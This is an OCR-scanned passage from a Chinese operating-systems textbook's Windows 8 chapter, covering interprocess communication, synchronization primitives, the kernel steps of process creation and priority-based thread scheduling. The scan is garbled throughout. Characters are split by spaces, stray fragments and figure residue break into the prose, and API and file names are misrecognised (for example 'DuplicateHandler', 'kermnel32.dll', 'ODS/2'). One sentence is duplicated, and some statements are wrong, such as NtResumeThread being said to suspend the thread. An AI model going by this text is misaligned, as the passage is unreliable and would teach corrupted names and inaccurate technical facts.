共享 文件 等 。 管 道 有 两 种 模式 : 字 节 管道 和 消息 管道 ， 可 以 在 创建 的 时 候选 择 。 字 节 模 式 的 管道 的 工作 
方式 与 UNIX 下 的 工作 方式 一 样 。 消 息 模 式 的 管道 与 字 节 模式 的 管道 大 致 相同 ， 但 会 维护 消息 边界 。 所 
以 写 人 四 次 的 128 字 节 ， 读 出 来 也 是 四 个 128 字 节 的 消息 ， 而 不 会 像 字 节 模式 的 管道 一 样 读 出 的 是 一 个 
512 字 节 的 消息 。 命 名 管道 也 是 有 的 ， 跟 普通 的 管道 一 样 都 有 两 种 模式 ， 但 命名 管道 可 以 在 网 络 中 使 用 ， 
而 普通 管道 只 能 在 单机 中 使 用 。 

邮件 槽 是 ODS/2 操 作 系 统 的 特性 , 在 Windows 中 实现 只 是 为 了 兼容 性 。 它 们 在 某 种 方式 上 跟 管 道 类 似 ， 
但 不 完全 相同 。 首 先 ， 它 们 是 单 向 的 ， 而 管道 则 是 双向 的 。 而 且 ， 它 们 能 够 在 网 络 中 使 用 但 不 提供 有 保 
证 的 传输 。 最 后 ， 它 们 人 允许 发 送 进程 将 消息 广播 给 多 个 接收 者 而 不 仅仅 是 一 个 接收 者 。 邮 件 槽 和 命名 管 
道 在 Windows 中 都 是 以 文件 系统 的 形式 实现 ， 而 非 可 执行 的 功能 函数 。 这 样 做 就 可 以 通过 现 有 的 远程 文 
件 系统 协议 在 网 络 上 来 访问 到 它们 。 

套 接 字 也 与 管道 类 似 ， 只 不 过 它们 通常 连接 的 是 不 同 机 器 上 的 两 个 进程 。 例 如 ， 一 个 进程 往 一 个 套 
接 字 里 面 写 和 人 内容， 远程 机 器 上 的 另外 一 个 进程 从 这 个 套 接 字 中 读 出 来 。 套 接 字 同 样 也 可 以 被 用 在 同一 
台 机 器 上 的 进程 通信 ， 但 是 因为 它们 比 管道 带 来 了 更 大 的 开销 ， 所 以 一 般 来 说 它们 只 被 用 于 网 络 环境 下 
的 通信 。 套 接 字 原来 是 为 伯克利 UNIX 而 设计 的 ， 它 的 实现 代码 很 多 都 是 可 用 的 ， 正 如 Windows 发 布 日 
志 里 面 所 写 的 ，Windows 代 码 中 使 用 了 一 些 伯克利 的 代码 及 数据 结构 。 

远程 过 程 调用 (RPC) 是 一 种 进程 A 命令 进程 B 调 用 进程 B 地 址 空间 中 的 一 个 函数 ， 然 后 将 执行 结果 
返回 给 进程 A 的 方式 。 在 这 个 过 程 中 对 参数 的 限制 很 多 。 例 如 ， 如 果 传 递 的 是 个 指针 ， 那 么 对 于 进程 B 
来 说 这 个 指针 毫 无 意义 ， 因 此 必须 把 数据 结构 打包 起 来 然后 以 进程 无 关 的 方式 传输 。 实 现 RPC 的 时 候 ， 
通常 是 把 它 作 为 传输 层 之 上 的 抽象 层 来 实现 。 例 如 对 于 Windows 来 说 ， 可 以 通过 TCP/IP 套 接 字 、 命 名 管 
道 、ALPC 来 进行 传输 。ALPC 的 全 称 是 高 级 本 地 过 程 调用 (Advanced Local Procedure Call) ， 它 是 内 核 
态 下 的 一 种 消息 传递 机 制 ， 为 同一 台 机 器 中 的 进程 间 通 信 作 了 优化 ， 但 不 支持 网 络 间 通 信 。 基 本 的 设计 
思想 是 可 以 发 送 有 回复 的 消息 ， 以 此 来 实现 一 个 轻 量 级 的 RPC 版 本 ， 提 供 比 ALPC 更 丰富 的 特性 。ALPC 
的 实现 是 通过 拷贝 参数 以 及 基于 消息 大 小 的 临时 共享 内 存 分 配 。 

最 后 ， 进 程 间 可 以 共享 对 象 ， 如 段 对 象 。 段 对 象 可 以 同时 被 映射 到 多 个 进程 的 虚拟 地 址 空间 中 ， 一 
个 进程 执行 了 写 操 作 之 后 ， 其 他 进程 可 以 也 可 以 看 见 这 个 写 操作 。 通 过 这 个 机 制 ， 在 生产 者 消费 者 问题 
中 用 到 的 共享 缓冲 区 就 可 以 轻松 地 实现 。 

2. 同步 

进程 间 也 可 以 使 用 多 种 形式 的 同步 对 象 。 就 像 Windows 中 提供 了 多 种 形式 的 进程 间 通信 机 制 一 样 ， 
它 也 提供 了 多 种 形式 的 同步 机 制 ， 包 括 信号 量 、 互 斥 量 、 临 界 区 和 事件 。 所 有 的 这 些 机 制 只 在 线程 上 工 
作 ， 而 非 进 程 。 所 以 当 一 个 线程 由 于 一 个 信号 量 而 阻塞 时 ， 同 一 个 进程 的 其 他 线程 (如果 有 的 话 ) 会 继 
续 运 行 而 并 不 会 被 影响 。 

使 用 Win32 的 API 函 数 CreateSemaphore 可 以 创建 一 个 信号 量 ， 可 以 将 它 初始 化 为 一 个 给 定 的 值 ， 
同时 也 可 以 指定 最 大 值 。 信 号 量 是 一 个 内 核 态 对 象 ， 因 此 拥有 安全 描述 符 和 句柄 。 信 和 号 量 的 句柄 可 以 通 
过 使 用 DuplicateHandler 来 进行 复制 ， 然 后 传递 给 其 他 进程 使 得 多 个 进程 可 以 通过 相同 的 信号 量 来 进行 
同步 。 在 Win32 的 名 字 空间 中 一 个 信号 量 也 可 以 被 命名 ， 可 以 拥有 一 个 ACL 集 合 来 保护 它 。 有 些 时 候 通 
过 名 字 来 共享 信号 量 比 通过 拷贝 句柄 更 合适 。 

对 up 和 down 的 调用 也 是 有 的 ， 只 不 过 它们 的 函数 名 看 起 来 比较 奇怪 : ReleaseSemaphore (up) 
和 WaitForSingleObject (down)。 可 以 给 WaitForSingleObject 一 个 超时 时 间 ， 使 得 尽管 此 时 信和 号 量 仍 
然 是 0， 调 用 它 的 线程 仍然 可 以 被 释放 (尽管 定时 器 重新 引入 了 竞 态 ) 。WaitForSingleObject 和 
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WaitForMultipleObject 是 将 在 11.3 节 中 讨论 的 分 发 者 对 象 的 常见 接口 。 尽 管 有 可 能 将 单个 对 象 的 API 封 
装 成 看 起 来 更 加 像 信号 量 的 名 字 ， 但 是 许多 线程 使 用 多 个 对 象 的 版 本 ， 这 些 对 象 可 能 是 各 种 各 样 的 同步 
对 象 ， 也 可 能 是 其 他 类 似 进程 或 线程 结束 、I/O 结 束 、 消 息 到 达 大 , 接 字 和 端口 等 事件 。 

互 斥 量 也 是 用 于 同步 的 内 核 态 对 象 ， 但 是 比 信号 量 简单 ， 因 为 互 斥 量 不 需要 计数 器 。 它 们 其 实 是 锁 ， 
上 锁 的 函数 是 WaitForSingleObject， 解 锁 的 函数 是 ReleaseMutex。 就 像 信号 量 句柄 一 样 ， 互 斥 量 的 句 
柄 也 可 以 复制 ， 并 且 在 进程 间 传递 ， 从 而 不 同 进程 间 的 线程 可 以 访问 同一 个 互 斥 量 。 

第 三 种 同步 机 制 是 临界 区 ， 实 现 的 是 临界 区 的 概念 。 临 界 区 在 Windows 中 与 互 斥 量 类 似 ， 但 是 临界 
区 相对 于 主创 建 线 程 的 地 址 空间 来 说 是 本 地 的 。 因 为 临界 区 不 是 内 核 态 的 对 象 ， 所 以 它们 设 有 显 式 的 句 
柄 或 安全 描述 符 ， 而 且 也 不 能 在 进程 间 传 递 。 上 锁 和 解锁 的 函数 分 别 是 EnterCriticalSection 和 
LeaveCriticalSection。 因 为 这 些 API 函 数 在 开始 的 时 候 只 是 在 用 户 空间 中 ， 只 有 当 需 要 阻塞 的 时 候 才 调 
用 内 核 函 数 ， 它 们 比 互 斥 量 快 得 多 。 在 需要 的 时 候 ， 可 以 通过 合并 自 旋 锁 (在 多 处 理 器 上 ) 和 内 核 同步 
机 制 来 优化 临界 区 。 在 许多 应 用 中 ， 大 多 数 的 临界 区 几乎 不 会 被 竞争 或 者 只 被 锁 住 很 短 的 时 间 ， 以 至 于 
没 必要 分 配 一 个 内 核 同 步 对 象 ， 这 样 会 极 大 地 节省 内 核 内 存 。 

另外 一 种 同步 机 制 使 用 了 事件 的 内 核 态 对 象 。 就 像 我 们 前 面 描述 的 ， 有 两 类 的 事件 一 一 通知 事件 和 同 
步 事 件 。 一 个 事件 的 状态 有 两 种 : 收 到 信号 和 没收 到 信号 。 一 个 线程 通过 调用 WaitForSingleObject 来 等 
待 一 个 事件 被 信号 通知 。 如 果 另 一 个 线程 通过 SetEvent 给 事件 发 信号 ， 会 发 生 什么 取决 于 这 个 事件 的 类 
型 。 对 于 通知 事件 来 说 ， 所 有 等 待 线程 都 会 被 释放 ， 并 且 事 件 保 持 在 set 状 态 ， 直 到 手工 调用 ResetEvent 
进行 清除 ， 对 于 同步 事件 来 说 ， 如 果 有 一 个 或 多 个 线程 在 等 待 ， 那 么 有 且 仅 有 一 个 线程 会 被 唤醒 并 且 事 
件 被 清除 。 另 一 个 替换 的 操作 是 PulseEvent， 像 SetEvent 一 样 ， 除 了 在 没有 人 等 待 的 时 候 脉 冲 会 丢失 ， 而 
事件 也 被 清除 。 另 外 一 个 替换 的 操作 是 PulseEvent， 像 SetEvent 一 样 ， 除 了 在 没有 人 等 待 的 时 候 脉冲 会 被 
丢失 ， 而 事件 也 被 清除 。 相 反 ， 如 果 调 用 SetEvent 时 没有 等 待 的 线程 ， 那 么 这 个 设置 动作 依然 会 起 作用 ， 
被 设置 的 事件 处 于 被 信号 通知 的 状态 ， 所 以 当 后 面 的 那个 线程 调用 等 待 事件 的 API 时 ， 这 个 线程 将 不 会 等 


待 而 直接 返回 。 
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的 处 理 了 C 的 函数 。 
最 近 Windows 加 了 两 种 新 的 原 语 同步 机 
制 ， 即 WaitOnAddress 和 InitOnceExecute- 
Once 模 式 。 当 特定 地 址 的 值 被 修改 的 时 候 ， 
系统 会 调用 WaitOnAddress。 在 修改 了 该 位 
置 之 后 该 应 用 程序 必须 要 调用 
WakeByAddressSingle (或 者 WakeBy - 
AddressAll) 来 唤醒 第 一 个 (或 全 部 ) 调用 
WaitOnAddress 的 线程 。 相 对 于 使 用 事件 而 
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到 一 个 等 待 者 列表 ) 。WaitOnAddress 与 
UNIX 系 统 中 的 睡眠 /唤醒 机 制 十 分 相像 。 
InitOnceExecuteOnce 可 以 用 来 保证 初始 化 
只 在 程序 中 出 现 一 次 。 对 于 数据 结构 的 正确 
的 初始 化 在 多 线程 程序 中 出 人 意料 地 难 。 对 











ute: 
He MRL 
策略 都 列 在 了 图 11-24 中 。 


可 以 注意 到 不 是 所 有 的 都 是 系统 调用 。 图 11-24 一 些 管理 进程 、 线 程 以 及 纤 程 的 一 些 Win32 调 用 
其 中 有 一 些 是 包装 器 ， 有 一 些 包 含 了 重要 的 库 代 码 ， 这 些 库 代 码 将 Win32 的 接口 映射 到 原生 NT 接口 。 另 


实例 研 穹 2: Windows 8 521 


外 一 些 ， 例 如 纤 程 的 API， 全 部 都 是 用 户 态 下 的 函数 ， 因 为 就 像 我 们 之 前 提 到 的 ，Windows 的 内 核 态 中 
根本 没有 纤 程 的 概念 ， 纤 程 完全 都 是 由 用 户 态 下 的 库 来 实现 的 。 


11.4.3 进程 和 线程 的 实现 

本 节 将 用 更 多 细节 来 讲述 Windows 如 何 创建 一 个 进程 。 由 于 Win32 是 最 具 文档 化 的 接口 ， 因 此 我 们 
将 以 此 为 例 开始 讲述 。 我 们 直接 进入 内 核 来 理解 创建 一 个 新 进程 的 本 地 API 调 用 是 如 何 实现 的 ， 我 们 主 
要 着 眼 于 创建 进程 时 执行 的 主 代码 路 径 ， 以 及 补充 已 经 介绍 的 知识 之 间 还 欠缺 的 一 些 细节 。 

当 用 一 个 进程 调用 Win32 CreateProcess 系 统 调用 的 时 候 ， 则 创建 一 个 新 的 进程 。 这 种 调用 使 用 
kermnel32.dll 中 的 一 个 (用户 态 ) 进程 来 分 几 步 创建 新 进程 ， 其 中 会 使 用 多 次 系统 调用 和 执行 其 他 的 一 些 操作 。 

1) 把 可 执行 的 文件 名 从 一 个 Win32 路 径 名 转化 为 一 个 NT 路 径 名 。 如 果 这 个 可 执行 文件 仅 有 一 个 名 
F, 而 没有 一 个 目录 名 ， 那 么 就 在 默认 的 目录 里 面 查找 (包括 ， 但 不 限于 ， 那 些 在 PATH 环境 变量 中 的 ) 。 

2) 绑 定 这 个 创建 过 程 的 参数 ， 并 且 把 它们 和 可 执行 程序 的 完全 路 径 名 传递 给 本 地 API 
NtCreateUserProcess, 

3) 在 内 核 态 里 运行 ，NtCreateUserProcess 处 理 参数 ， 然 后 打开 这 个 进程 的 映像 ， 创 建 一 个 内 存 区 
对 象 (section object), ， 它 能 够 用 来 把 程序 映射 到 新 进程 的 虚拟 地 址 空间 。 

4) 进程 管理 器 分 配 和 初始 化 进程 对 象 。( 对 于 内 核 和 执行 县 ， 这 个 内 核 数据 结构 就 表示 一 个 进程 。) 

5) 内 存 管理 器 通过 分 配 和 创建 页 目录 及 虚拟 地 址 描述 符 来 为 新 进程 创建 地 址 空间 。 虚 拟 地 址 描述 符 
描述 内 核 态 部 分 ， 包 括 特定 进程 的 区 域 ， 例 如 自 映 射 的 页 目录 入 口 可 以 为 每 一 个 进程 在 内 核 态 使 用 内 核 
虚拟 地 址 来 访问 它 整个 页 表 中 的 物理 页 面 。 

6) 一 个 句柄 表 为 新 的 进程 所 创建 。 所 有 来 自 于 调用 者 并 允许 被 继承 的 句柄 都 被 复制 到 这 个 句柄 表 中 。 

7) 共享 的 用 户 页 被 映射 并且 内 存 管理 器 初始 化 一 个 工作 集 的 数据 结构 ， 这 个 数据 结构 是 在 物理 内 
存 缺 少 的 时 候 用 来 决定 哪些 页 可 以 从 一 个 进程 里 面 移出 。 可 执行 映像 中 由 内 存 区 对 象 表 示 的 部 分 会 被 映 
射 到 新 进程 的 用 户 态 地 址 空间 。 

8) 执行 体 创建 和 初始 化 用 户 态 的 进程 环境 块 (PEB ) ， 这 个 PEB 被 用 来 为 用 户 态 和 内 核 维护 进程 范 
围 的 状态 信息 ， 例 如 用 户 态 的 堆 指针 和 可 加 载 库 列表 (DLL). 

9) 虚拟 内 存 是 分 配 在 (DK) 新 进程 里 面 的 ， 并 且 用 于 传递 参数 ， 包 括 环境 变量 和 命令 行 。 

10) 一 个 进程 ID 从 特殊 的 句柄 表 (ID 表 ) 分 配 ， 这 个 句柄 表 是 为 了 有 效 地 定位 进程 和 线程 局 部 唯一 
的 ID。 

11) 一 个 线程 对 象 被 分 配 和 初始 化 。 在 分 配 线程 环境 块 (TEB) 的 同时 ， 也 分 配 一 个 用 户 态 栈 。 包 
含 了 线程 的 为 CPU 寄存 器 保持 的 初始 值 (包括 指令 和 栈 指针 ) 的 CONTEXT 记 录 也 被 初始 化 了 。 

12) 进程 对 象 被 添 到 进程 全 局 列表 中 。 进 程 和 线程 对 象 的 句柄 被 分 配 到 调用 者 的 句柄 表 中 。ID 表 会 
为 初始 线程 分 配 一 个 ID。 

13) NtCreateUserProcess 向 用 户 态 返 回 新 建 的 进程 ， 其 中 包括 处 于 就 绪 并 被 挂 起 的 单一 线程 。 

14) 如 果 NT API 失 败 ，Win32 代 码 会 查看 进程 是 否 属于 另 一 子 系统 ， 如 WOW64。 或 者 程序 可 能 设 
置 为 在 调试 状态 下 运行 。 以 上 特殊 情况 由 用 户 态 的 CreateProcess 代 码 处 理 。 

15) 如 果 NtCreateUserProcess 成 功 ， 还 有 一 些 操作 要 完成 ，Win32 进程 必须 向 Win32 子 系统 进程 
cSTSS.exe 注 册 。Kernel32.dll 向 csrss.exe 发 送信 息 一 一 新 的 进程 及 其 句柄 和 线程 句柄 ， 从 而 进程 可 以 进行 
自我 复制 。 将 进程 和 线程 加 入 子 系统 列表 中 ， 使 得 它们 拥有 了 所 有 Win32 的 进程 和 线程 的 完整 列表 。 子 
系统 此 时 就 显示 一 个 带 沙 漏 的 光标 以 表明 系统 正 运行 ， 但 光标 还 能 使 用 。 当 进程 首次 调用 GUI 函数 ， 通 
常 是 创建 新 窗口 时 光标 将 消失 (如 果 没 有 调用 到 来 ，2 秒 后 就 会 超时 )。 

16) 如 果 进 程 受 限 ， 如 低 权 限 的 Internet Explorer， 令 牌 会 被 改变 ， 限 制 新 进程 访问 对 象 。 

17) 如 果 应 用 程序 被 设置 成 需要 垫 层 才能 与 当前 Windows 版 本 兼容 运行 ， 则 特定 的 垫 层 将 运行 。 垫 
层 通常 封装 库 调 用 以 稍微 修改 它们 的 行为 ， 例 如 返回 一 个 假 的 版 本 号 或 者 延迟 内 存 的 释放 。 

18) 最 后 ， 调 用 NtResumeThread 挂 起 线程 ， 并 把 这 个 结构 返回 给 包含 所 创建 的 进程 和 线程 的 ID、 
句柄 的 调用 者 。 

在 Windows 的 早期 版 本 中 ， 很 多 进程 创建 的 算法 是 在 用 户 态 执行 的 ， 这 些 用 户 态 程序 通过 使 用 多 个 
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系统 调用 ， 以 及 执行 其 他 使 用 支持 子 系 统 的 NT 原生 API 的 任务 来 执行 算法 。 为 了 降低 父 进 程 对 子 进程 的 
操作 能 力 ， 以 防 一 个 子 进程 正在 执行 一 段 受 保护 程序 (例如 它 执 行 了 电影 防盗 版 的 DRM)， 在 之 后 的 版 
本 中 ， 上 述 过 程 被 移 到 了 内 核 去 执行 。 

NtResumeThread 这 个 初始 原生 API 仍 然 是 系统 支持 的 ， 所 以 现在 的 许多 进程 仍然 能 够 在 父 进程 的 用 
户 态 被 创建 ， 只 要 这 个 被 创建 的 进程 不 是 受 保护 的 进程 。 

调度 

Windows 内 核 没 有 中 央 调 度 线程 。 所 以 ， 当 一 个 线程 不 能 再 执行 时 ， 线 程 将 进入 内 核 态 ， 调 度 线程 
此 时 决定 要 转向 的 下 一 个 线程 。 在 下 面 这 些 情况 下 ， 当 前 正在 执行 的 线程 会 执行 调度 程序 代码 : 

1) 当前 执行 的 线程 发 生 了 信号 量 、 互 斥 、 事 件 、L/O 等 类 型 的 阻塞 。 

2) 线程 向 一 个 对 象 发 信号 (如 发 一 个 信号 或 者 是 唤醒 一 个 事件 ) 时 。 

3) 时 间 配 额 到 期 。 

第 一 种 情况 ， 线 程 已 经 在 内 核 态 运行 并 开始 对 调度 器 或 输入 输出 对 象 执行 操作 了 。 它 将 不 能 继续 执 
行 , 所 以 线程 会 请 求 调度 程序 代码 寻找 装载 下 一 个 线程 的 CONTEXT 记 录 去 恢复 其 执行 。 

第 二 种 情况 ， 线 程 也 是 在 内 核 中 运行 的 。 但 是 ， 在 向 一 些 对 象 发 出 信号 后 ， 它 肯定 还 能 继续 执行 ， 
因为 发 信号 对 象 从 来 没有 受到 阻塞 。 然 而 ， 线 程 必须 请 求 调 度 程序 ， 来 观测 它 的 执行 结果 是 否 释放 了 一 
个 具有 更 高 调度 优先 级 的 正 准备 运行 的 线程 。 如 果 是 这 样 ， 而 因为 Windows 是 完全 抢占 式 的 ， 所 以 就 会 
发 生 一 个 线程 切换 (例如 ， 线 程 切换 可 以 发 生 在 任何 时 候 ， 而 不 仅仅 是 在 当前 线程 结束 时 )。 但 是 , 在 
多 处 理 器 的 情况 下 ， 处 于 就 绪 状 态 的 线程 会 在 另 一 个 CPU 上 被 调度 ， 那 么 ， 即 使 原来 线程 拥有 较 低 的 调 
度 优先 级 ， 也 能 在 当前 的 CPU 上 继续 执行 。 

第 三 种 情况 ， 内 核 态 发 生 中 断 ， 这 时 线程 执行 调度 程序 代码 找到 下 一 个 运行 的 线程 。 由 于 取决 于 
其 他 等 待 的 线程 ， 可 能 会 选择 同样 的 线程 ， 这 样 线程 就 会 获得 新 的 配额 ， 可 以 继续 执行 ， 否 则 发 生 线 
程 切换 。 

在 另外 两 种 情况 下 ， 也 会 执行 调度 程序 : 

1) 一 个 输入 输出 操作 完成 时 。 

2) 等 待 时 间 结 束 时 。 

在 第 一 种 情况 下 ， 之 前 可 能 在 等 待 输入 输出 操作 完成 的 线程 会 被 释放 并 执行 。 如 果 不 保证 最 小 执行 
时 间 ， 则 必须 检查 是 否 可 以 事先 对 运行 的 线程 进行 抢占 。 调 度 程序 不 会 在 中 断 处 理 程序 中 运行 (因为 那 
使 中 断 关闭 保持 太 久 )。 相 反 ， 中 断 处 理发 生 后 ，DPC 会 排队 等 待 一 会 儿 。 第 二 种 情况 下 ， 线 程 已 经 对 
一 个 信号 量 进行 了 down 操 作 或 者 因 一 些 其 他 对 象 而 被 阻塞 ， 但 是 定时 器 已 经 过 期 。 对 于 中 断 处 理 程 序 
来 说 ， 有 必要 让 DPC 再 一 次 排队 等 待 ， 以 防止 它 在 定时 器 中 断 处 理 程序 时 运行 。 如 果 一 个 线程 在 这 个 时 
刻 已 经 就 绪 ， 则 调度 程序 将 会 被 唤醒 ， 并 且 如 果 新 的 可 运行 线程 有 较 高 的 优先 级 ， 那 么 和 情形 1 的 情况 
类 似 ， 当 前 线程 会 被 抢占 。 

现在 让 我 们 来 看 看 具体 的 调度 算法 。Win32 API 提 供 两 个 API 来 影响 线程 调度 。 首 先 ， 有 一 个 叫 
SetPriorityClass 的 函数 用 来 设 定 被 调用 进程 中 所 有 线程 的 优先 级 。 其 等 级 可 以 是 : 实时 、 高 、 高 于 标 
准 、 标 准 、 低 于 标准 和 空闲 的 。 优先 级 决定 进程 的 先后 顺序 。( 在 Vista 系 统 中 ， 进 程 优先 级 等 级 也 可 以 
被 一 个 进程 用 来 临时 地 把 它 自己 标记 为 后 台 运行 (background) 状态 ， 即 它 不 应 该 被 任何 其 他 的 活动 进 
程 所 干扰 。) 注意 优先 级 是 对 进程 而 言 的 ， 但 是 实际 上 会 在 每 个 线程 被 创建 的 时 候 通 过 设置 每 个 线程 开 
始 运行 的 基本 优先 级 影响 进程 中 每 个 线程 的 实际 优先 级 。 

第 二 个 就 是 SetThreadPriority。 它 根据 进程 的 优先 级 类 来 设 定 进 程 中 每 个 线程 的 相对 优先 级 〈 可 能 
地 ， 但 是 不 必然 地 ， 调 用 线程 )。 可 划分 如 下 等 级 : 紧要 的 、 最 高 的 、 高 于 标准 的 、 标 准 的 、 低 于 标准 
的 、 最 低 的 和 休眠 的 。 时 间 紧 急 的 线程 得 到 最 高 的 非 即 时 的 调度 优先 ， 而 空闲 的 线程 不 管 其 优先 级 类 别 
都 得 到 最 低 的 优先 级 。 其 他 优先 级 的 值 依据 优先 级 的 等 级 来 定 ， 依 次 为 (+2, +1, 0, 一 1, -2)。 进 程 优 先 
级 等 级 和 相对 线程 优先 级 的 使 用 使 得 系统 能 够 更 容易 地 确定 应 用 程序 的 优先 级 。 

调度 程序 按照 下 列 方式 进行 调度 。 系 统 有 32 个 优先 级 ， 从 0 到 31。 依 照 图 11-25 的 表格 ， 进 程 优先 
级 和 相对 线程 优先 级 的 组 合 形成 32 个 绝对 线程 优先 级 。 表 格 中 的 数字 决定 了 线程 的 基本 优先 级 (base 
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priority)。 除 此 之 外 ， 每 个 线程 都 有 当前 优先 级 (current priority), 
是 不 低 于 ) 前 面 提 到 的 基本 优先 级 ， 关 于 这 一 点 我 们 稍 后 将 会 讨论 。 


这 个 当前 的 优先 级 可 能 会 高 于 (但 





bal i 




















11-25 Win32 优 先 级 到 Windows 优 先 级 的 映射 


为 了 使 用 这 些 优先 级 进行 调度 ， 系 统 维护 一 个 包含 32 个 线程 列表 的 队列 ， 分 别 对 应 图 11-27 中 的 0 ~ 
31 的 不 同等 级 。 每 个 列表 包含 了 就 绪 线程 对 应 的 优先 级 。 基 本 的 调度 算法 是 从 优先 级 队列 中 按照 31 到 0 
的 从 高 优先 级 到 低 优 先 级 的 顺序 查找 。 一 旦 一 个 非 空 的 列表 被 找到 ， 等 待 队 首 的 线程 就 运行 一 个 时 间 
片 。 如果 时 间 配 额 已 用 完 , 这 个 线程 排 到 其 优先 级 的 队 尾 ， 而 排 在 前 面 的 线程 就 接 下 来 运行 。 换 句 话说 ， 
当 在 最 高 的 优先 级 有 多 条 线程 处 于 就 绪 状 态 ， 它 们 就 按时 间 片 轮转 法 来 调度 。 如 果 没 有 就 绪 的 线程 ， 那 
么 处 理 器 空间 ， 并 设置 成 低 功 耗 状 态 来 等 待 中 断 的 发 生 。 

值得 注意 的 是 ， 调 度 取决 于 线程 而 不 是 取决 于 线程 所 属 的 进程 。 因 此 调度 程序 并 不 是 首先 查看 进程 
然后 再 是 进程 中 的 线程 。 它 直接 找到 线程 。 调 度 程序 并 不 考虑 哪个 线程 属于 哪个 进程 ， 除 非 进 行 线程 切 
换 时 需要 做 地 址 空间 的 转换 。 

为 了 改进 在 具有 大 量 处 理 器 的 多 处 理 器 情况 下 的 调度 算法 的 可 伸缩 性 ， 调 度 管理 器 尽力 不 给 全 局 的 
优先 级 表 的 数组 加 上 一 个 全 局 的 锁 来 实现 保护 访问 控制 。 相 反 地 ， 对 于 一 个 准备 到 CPU 的 线程 来 说 ， 若 
是 处 理 器 已 就 位 ， 则 可 以 让 它 直接 进行 ， 而 不 必 进 行 加 锁 操作 。 

对 于 每 一 个 进程 ， 调 度 管理 器 都 维护 了 一 个 理想 处 理 器 (ideal processor) 记录 ， 它 会 在 尽 可 能 的 
时 候 让 线程 在 这 个 理想 处 理 器 上 运行 。 这 改善 了 系统 的 性 能 ， 因 为 线程 所 用 到 的 数据 驻 留 在 理想 处 理 器 
的 内 存 中 。 调 度 管理 器 可 以 感知 多 处 理 器 的 环境 ， 并 且 每 一 个 处 理 器 有 自己 的 内 存 ， 可 以 运行 需要 任意 
大 小 内 存 空 间 的 程序 一 一 但 是 如 果 内 存 不 在 本 地 ， 则 会 花费 较 大 的 时 间 开 销 。 这 些 系 统 被 认为 是 NUMA 
( 非 统一 内 存 地 址 ) 设备 。 调 度 管理 器 努力 优化 线程 在 这 类 计算 机 上 的 分 配 。 当 线程 出 现 缺 页 错误 时 ， 
内 存 管理 器 努力 把 属于 理想 处 理 器 的 





NUMA 节 点 的 物理 页 面 分 配给 线程。 RER [3 下 一 个 要 运行 的 线程 
队 首 的 队列 在 图 11-26 中 表示 。 这 个 图 
表明 实际 上 有 四 类 优先 等 级 ， 实时 级 、 用 系统 


户 级 、 零 页 和 空闲 级 ， 即 当 它 为 -1 时 有 效 。 
这 些 值得 我 们 深入 讨论 。 优 先 级 16 一 31 属 
于 实时 级 的 一 类 ， 用 来 构建 满足 实时 性 约 s 
束 的 系统 ， 比 如 截止 日 期 需要 多 媒体 的 展 


示 。 处 于 实时 级 的 线程 优先 于 任何 动态 分 





户 
配 级 别 的 线程 ， 但 是 不 先 于 DPC 和 ISR。 如 RAR g 

果 一 个 实时 级 的 应 用 程序 想 要 在 系统 上 运 

行 ， 它 就 要 求 设 备 驱动 不 能 花费 额外 的 时 evan (i 

间 来 运行 DPC 和 ISR， 因 为 这 样 可 能 导致 这 p ERRET 


些 实时 线程 错过 它们 的 截止 时 间 。 
sb a 
如 果 一 个 用 户 级 线程 在 一 个 高 优先 级 运 


空闲 线程 
图 11-26 Windows 支 持 32 个 线程 优先 级 
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行 ， 比 如 说 ， 键 盘 或 者 鼠标 线程 进入 了 一 个 死 循环 ， 键 盘 或 者 鼠标 永远 得 不 到 运行 从 而 系统 被 挂 起 。 把 
优先 级 设置 为 实时 级 的 权限 ， 需 要 启用 进程 令 牌 中 相应 的 特权 。 通 常用 户 没 有 这 个 特权 。 

应 用 程序 的 线程 通常 在 优先 级 1 一 15 上 运行 。 通 过 设 定 进程 和 线程 的 优先 级 ， 一 个 应 用 程序 可 以 决 
定 哪些 线程 得 到 偏爱 (获得 更 高 优先 级 )。 ZeroPage 系 统 线程 运行 在 优先 级 0 并 且 把 所 有 要 释放 的 页 转化 
为 全 部 包含 0 的 页 。 每 一 个 实时 的 处 理 器 都 有 一 个 独立 的 ZeroPage 线 程 。 

每 个 线程 都 有 一 个 基于 进程 优先 级 的 基本 优先 级 和 一 个 线程 自己 的 相对 优先 级 。 用 于 决定 一 个 线程 
在 32 个 列表 中 的 哪 一 个 列表 进行 排队 的 优先 级 取决 于 当前 优先 级 ,通常 是 得 到 和 当前 线程 的 基本 优先 级 
一 样 的 优先 级 ， 但 并 不 总 是 这 样 。 在 特定 的 情况 下 ， 非 实时 线程 的 当前 优先 级 被 内 核 一 下 子 提 到 尽 可 能 
高 的 优先 级 (但 是 不 会 超过 优先 级 15)。 因 为 图 11-26 的 排列 以 当前 的 优先 级 为 基础 ， 所 以 改变 优先 级 可 
以 影响 调度 。 对 于 实时 优先 级 的 线程 ， 没 有 任何 的 调整 。 

现在 让 我 们 看 看 一 个 线程 在 什么 样 的 时 机 会 得 到 提升 。 首 先 ， 当 输入 输出 操作 完成 并 且 唤醒 一 个 等 
待 线 程 的 时 候 ， 优 先 级 一 下 子 被 提高 ， 给 它 一 个 快速 运行 的 机 会 ， 这 样 可 以 使 更 多 的 IO 可 以 得 到 处 理 。 
这 里 保证 IO 设备 处 于 忙碌 的 运行 状态 。 提 升 的 幅度 依赖 于 输入 输出 设备 ， 典 型 地 磁盘 片 对 应 于 1 级 ， 虽 
行 总 线 对 应 于 2 级 ，6 级 对 应 于 键盘 ，8 级 对 应 于 声卡 。 

其 次 ， 如 果 一 个 线程 在 等 待 信号 量 ， 互 斥 量 同步 或 其 他 的 事件 ， 当 这 些 条 件 满足 线程 被 唤醒 的 时 候 ， 
如 果 它 是 前 台 的 进程 (该 进程 控制 键盘 输入 发 送 到 的 窗口 ) 中 的 线程 的 话 ， 这 个 线程 就 会 得 到 两 个 优先 
级 的 提升 ， 其 他 情况 则 只 提升 一 个 优先 级 。 这 倾向 于 把 交互 式 的 进程 优先 级 提升 到 8 级 以 上 。 最 后 ， 如 
果 一 个 窗口 输入 就 绪 使 得 图 形 用 户 接口 线程 被 唤醒 ， 它 的 优先 级 同样 会 得 到 大 幅 提 升 。 

提升 不 是 永远 的 。 优 先 级 的 提升 是 立刻 发 生 作 用 的 ， 并 且 会 引起 处 理 器 的 再 次 调度 。 但 是 如 果 一 
个 线程 用 完 它 的 时 间 分 配 量 ， 它 就 会 降低 一 个 优先 级 而 且 排 在 新 优先 级 队列 的 队 尾 。 如 果 它 两 次 用 完 一 
